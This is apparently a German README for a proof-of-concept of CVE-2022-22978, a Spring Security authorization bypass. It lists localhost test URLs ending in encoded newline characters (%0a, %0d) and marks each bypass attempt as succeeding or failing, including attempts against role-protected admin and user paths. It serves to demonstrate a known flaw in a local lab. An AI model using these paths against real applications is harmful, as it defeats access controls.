
CVE-2022-22978 POC Projekt
Spring Security
Pass Spring Security (Erfolg)
http://localhost:9090/login%0a
Pass Spring Security mit SayMyName (Fehlschlag)
http://localhost:9090/name%0d
Bypass Spring Security mit benutzerdefiniertem RBAC (Fehlschlag)
http://localhost:9090/admin/admin%0d
Bypass Spring Security mit Annotation RBAC (Fehlschlag)
http://localhost:9090/user/user%0a